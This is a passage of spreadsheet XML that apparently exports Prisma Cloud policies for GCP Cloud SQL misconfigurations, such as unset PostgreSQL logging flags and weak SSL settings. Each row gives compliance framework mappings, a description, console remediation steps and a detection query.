(CSCRF), CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.1.0 (GCP), PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, Rehan, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, CIS v3.0.0 (GCP) Level 1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CIS v3.0.0 (GCP) Level 1, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2962" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2962" s="2" t="inlineStr"/>
      <c r="D2962" t="inlineStr"/>
      <c r="E2962" t="inlineStr"/>
      <c r="F2962" t="inlineStr"/>
      <c r="G2962" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2962" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2962" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_min_messages is not set</t>
        </is>
      </c>
      <c r="L2962" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2962" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2962" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2962" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2962" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2962" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2962" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2962" t="inlineStr"/>
      <c r="T2962" t="b">
        <v>0</v>
      </c>
      <c r="U2962" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2962" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2962" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_min_messages is not set. The log_min_messages flag controls which message levels are written to the server log, valid values are DEBUG5, DEBUG4, DEBUG3, DEBUG2, DEBUG1, INFO, NOTICE, WARNING, ERROR, LOG, FATAL, and PANIC. Each level includes all the levels that follow it. log_min_messages flag value changes should only be made in accordance with the organization's logging policy. Auditing helps in troubleshooting operational problems and also permits forensic analysis.</t>
        </is>
      </c>
      <c r="X2962" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5.Under 'Configuration options', click on 'Add item' in 'Flags' section, choose the flag 'log_min_messages' from the drop-down menu and set the value in accordance with your organization's logging policy.
6. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-6</t>
        </is>
      </c>
      <c r="Y2962" t="inlineStr"/>
      <c r="Z2962" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and settings.databaseFlags[?(@.name=='log_min_messages')] does not exist"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2962" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2962" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2962" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-546-CKV_GCP_55</t>
        </is>
      </c>
      <c r="AD2962" t="b">
        <v>1</v>
      </c>
      <c r="AE2962" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2962" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2" t="inlineStr">
        <is>
          <t>86150e32-f69c-400b-9bc2-444b03795545</t>
        </is>
      </c>
      <c r="AI2962" t="inlineStr">
        <is>
          <t>34b9685e-8fc8-4504-b7fb-037b7733a2b0</t>
        </is>
      </c>
      <c r="AJ2962" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2962" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2963">
      <c r="A2963"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Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1,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NIST CSF v2.0, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.2.0 (GCP)</t>
        </is>
      </c>
      <c r="B2963" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2963" s="2" t="inlineStr"/>
      <c r="D2963" t="inlineStr"/>
      <c r="E2963" t="inlineStr"/>
      <c r="F2963" t="inlineStr"/>
      <c r="G2963" t="b">
        <v>1</v>
      </c>
      <c r="H29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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2963" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2963" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_planner_stats is not set to off</t>
        </is>
      </c>
      <c r="L2963" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2963" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2963" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2963" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2963" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2963" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2963" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2963" t="inlineStr"/>
      <c r="T2963" t="b">
        <v>0</v>
      </c>
      <c r="U2963" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2963" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2963" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_planner_stats is not set to off. The PostgreSQL planner/optimizer is responsible to create an optimal execution plan for each query. The log_planner_stats flag controls the inclusion of PostgreSQL planner performance statistics in the PostgreSQL logs for each query. This can be useful for troubleshooting but may increase the number of logs significantly and have performance overhead. It is recommended to set log_planner_stats off.</t>
        </is>
      </c>
      <c r="X2963" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_planner_stats' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Customize your instance', In 'Flags' section choose the flag 'log_planner_stats' and set the  value as 'off'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-16
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-16</t>
        </is>
      </c>
      <c r="Y2963" t="inlineStr"/>
      <c r="Z2963" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_planner_stats or settings.databaseFlags[?any(name contains log_planner_stats and value contains on)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2963" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2963" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2963" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-752-CKV2_GCP_16</t>
        </is>
      </c>
      <c r="AD2963" t="b">
        <v>1</v>
      </c>
      <c r="AE2963" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2963" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>40087b14-6b4c-440e-b77c-0d6de2954b2f</t>
        </is>
      </c>
      <c r="AI2963" t="inlineStr">
        <is>
          <t>95268e4e-964b-48ab-99b4-3299071e84a0</t>
        </is>
      </c>
      <c r="AJ2963" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2963" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2964">
      <c r="A2964" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, CIS v3.0.0 (GCP) Level 1, CIS v1.0.0 (GCP), CIS Controls v8, ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF, NIST CSF v2.0, CIS v1.2.0 (GCP), NIST CSF, APRA (CPS 234) Information Security, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, HITRUST CSF v9.3 [Deprecated], GDPR, jbrox - GDPR, CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev 5, ITSG-33, NIST SP 800-171 Revision 2, CIS Controls v7.1, ISO 27001:2013, SOC 2, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1, CIS v2.0.0 (GCP) Level 1, ISO 27001:2013, SOC 2, ISO 27001:2013, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, NIST CSF, ACSC Information Security Manual (ISM), DORA, TX-RAMP Level 2, NIST SP 800-171 Revision 3, NIST CSF, kfirdaus AWS Account-CS, CSA CCM v4.0.12, FFIEC, kfirdaus AWS Account-CS, Copy of CIS Controls v8, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, Rehan, Secure Controls Framework (SCF) - 2024.2, ISO 27001:2013, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, CCPA 2018, PIPEDA, CIS v1.1.0 (GCP), PCI DSS v4.0, NIST CSF, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CSA CCM v3.0.1, CIS v1.3.0 (GCP), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Australian Energy Sector Cyber Security Framework (AESCSF)</t>
        </is>
      </c>
      <c r="B2964" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2964" s="2" t="inlineStr"/>
      <c r="D2964" t="inlineStr"/>
      <c r="E2964" t="inlineStr"/>
      <c r="F2964" t="inlineStr"/>
      <c r="G2964" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2964" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2964" t="inlineStr">
        <is>
          <t>GCP SQL Instances do not have valid SSL configuration</t>
        </is>
      </c>
      <c r="L2964" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2964" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2964" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2964" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2964" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2964" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2964" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2964" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2964" t="b">
        <v>0</v>
      </c>
      <c r="U2964" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2964" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2964" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL instances that either lack SSL configuration or have SSL certificates that have expired.
If an SQL instance is not configured to use SSL, it may accept unencrypted and insecure connections, leading to potential risks such as data interception and authentication vulnerabilities.
It is a best practice to enable SSL configuration to ensure data security and integrity when communicating with a GCP SQL instance.</t>
        </is>
      </c>
      <c r="X2964" t="inlineStr">
        <is>
          <t>To configure SQL instance with SSL configuration,follow the steps mentioned below:
1. Log in to google cloud console
2. Navigate to 'Cloud SQL Instances'
3. Click on the alerted instance and navigate to 'Security' under 'Connections' tab
4. Select one of the following under 'Manage SSL mode':
  i. Allow only SSL connections
  ii. Require trusted client certificates
To verify the validity of the current certificate, follow the steps mentioned below:
1. Log in to google cloud console
2. Navigate to 'Cloud SQL Instances'
3. Click on the alerted instance and navigate to 'Security' under 'Connections' tab
4. Verify the expiration date of your server certificate under 'Manage server CA certificates' table
To create a new client certificate, follow the URL mentioned: https://cloud.google.com/sql/docs/mysql/configure-ssl-instance#client-certs</t>
        </is>
      </c>
      <c r="Y2964" t="inlineStr"/>
      <c r="Z2964" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name='gcloud-sql-instances-list' and json.rule = "(settings.ipConfiguration.sslMode equal ignore case TRUSTED_CLIENT_CERTIFICATE_REQUIRED and _DateTime.ageInDays(serverCaCert.expirationTime) &gt; -1) or settings.ipConfiguration.sslMode equal ignore case ALLOW_UNENCRYPTED_AND_ENCRYPTED"</t>
        </is>
      </c>
      <c r="AA2964" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2964" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2964" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-89</t>
        </is>
      </c>
      <c r="AD2964" t="b">
        <v>1</v>
      </c>
      <c r="AE2964" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2964" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>08d12f5a-eaef-416b-9597-3e557ffa9161</t>
        </is>
      </c>
      <c r="AI2964" t="inlineStr">
        <is>
          <t>34249a95-438c-4780-a27c-e3d50092c177</t>
        </is>
      </c>
      <c r="AJ2964" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2964" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2965">
      <c r="A2965"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Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, ISO 27002:2022, TX-RAMP Level 1, CRI Profile v1.2.1,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SOC 2, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, CIS Controls v8.1, CSA CCM v4.0.12, CIS v1.2.0 (GCP), DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2965" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2965" s="2" t="inlineStr"/>
      <c r="D2965" t="inlineStr"/>
      <c r="E2965" t="inlineStr"/>
      <c r="F2965" t="inlineStr"/>
      <c r="G2965" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2965" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2965" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_parser_stats is not set to off</t>
        </is>
      </c>
      <c r="L2965" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2965" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2965" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2965" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2965" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2965" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2965" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2965" t="inlineStr"/>
      <c r="T2965" t="b">
        <v>0</v>
      </c>
      <c r="U2965" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2965" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2965" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_parser_stats is not set to off. The PostgreSQL planner/optimizer is responsible to parse and verify the syntax of each query received by the server. The log_parser_stats flag enables a crude profiling method for logging parser performance statistics. Even though it can be useful for troubleshooting, it may increase the number of logs significantly and have performance overhead. It is recommended to set log_parser_stats as off.</t>
        </is>
      </c>
      <c r="X2965" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate SQL Instances page
3. Click on reported PostgreSQL instance
4. Click EDIT
5. If the flag has not been set on the instance, 
Under 'Customize your instance', click on 'ADD FLAG' in 'Flags' section, choose the flag 'log_parser_stats' from the drop-down menu and set the value as 'off'
OR
If the flag has been set to other than off, Under 'Customize your instance', In 'Flags' section choose the flag 'log_parser_stats' and set the value as 'off'
6. Click on 'DONE' and then 'SAVE' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-15
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/logging-policies-1/bc-gcp-2-15</t>
        </is>
      </c>
      <c r="Y2965" t="inlineStr"/>
      <c r="Z2965" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "state equals RUNNABLE and databaseVersion contains POSTGRES and (settings.databaseFlags[*].name does not contain log_parser_stats or settings.databaseFlags[?any(name contains log_parser_stats and value contains on)] exists)"
{"category":"Logging","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2965" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2965" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2965" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-755-CKV2_GCP_15</t>
        </is>
      </c>
      <c r="AD2965" t="b">
        <v>1</v>
      </c>
      <c r="AE2965" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2965" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>186a44a5-9530-4d85-9095-cbc1c417e7c8</t>
        </is>
      </c>
      <c r="AI2965" t="inlineStr">
        <is>
          <t>5072e3b8-0767-433b-9b06-d2003ba13650</t>
        </is>
      </c>
      <c r="AJ2965" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2965" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2966">
      <c r="A2966" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, CIS v1.2.0 (GCP), APRA (CPS 234) Information Security, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, ISO 27002:2022, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO 27002:2022, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], NIST SP 800-171 Revision 2, PCI DSS v4.0, CIS v3.0.0 (GCP) Level 1, HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, Rehan, TX-RAMP Level 2, CIS Controls v8, ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v7.1, SOC 2, CIS v1.3.0 (GCP), NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27002:2013, CIS v1.1.0 (GCP), ITSG-33, DORA, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CIS v2.0.0 (GCP) Level 1, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2966" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2966" s="2" t="inlineStr"/>
      <c r="D2966" t="inlineStr"/>
      <c r="E2966" t="inlineStr"/>
      <c r="F2966" t="inlineStr"/>
      <c r="G2966" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2966" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2966" t="inlineStr">
        <is>
          <t>GCP SQL Server instance database flag 'contained database authentication' is enabled</t>
        </is>
      </c>
      <c r="L2966" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2966" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2966" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2966" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2966" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2966" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2966" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2966" t="inlineStr"/>
      <c r="T2966" t="b">
        <v>0</v>
      </c>
      <c r="U2966" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2966" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2966" t="inlineStr">
        <is>
          <t>This policy identifies SQL Server instance database flag 'contained database authentication' is enabled. Most of the threats associated with contained database are related to authentication process. So it is recommended to disable this flag.</t>
        </is>
      </c>
      <c r="X2966" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Click on SQL Server instance for which you want to disable the database flag from the list
4. Click 'Edit'
5. Go to  'Flags and Parameters'  under 'Configuration options' section
6. Search for the flag 'contained database authentication' and set the value 'off'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-10</t>
        </is>
      </c>
      <c r="Y2966" t="inlineStr"/>
      <c r="Z2966" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains SQLSERVER and settings.databaseFlags[?(@.name=='contained database authentication')].value equals on"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2966" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2966" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2966" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-536-CKV_GCP_59</t>
        </is>
      </c>
      <c r="AD2966" t="b">
        <v>1</v>
      </c>
      <c r="AE2966" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2966" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>7e105686-9939-48e8-8e76-bfdf42b75ef6</t>
        </is>
      </c>
      <c r="AI2966" t="inlineStr">
        <is>
          <t>6d3ee4c7-5d06-4987-8bc8-bbf51209d23e</t>
        </is>
      </c>
      <c r="AJ2966" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2966" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2967">
      <c r="A2967" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.6, jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, CIS v1.2.0 (GCP), ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Rehan, CIS Controls v7.1, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, TX-RAMP Level 2, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, Fedramp (Low), ACSC Information Security Manual (ISM), Fedramp (Low), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, jneytchev-fedramp-low, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.1, Insurance Regulatory And Development 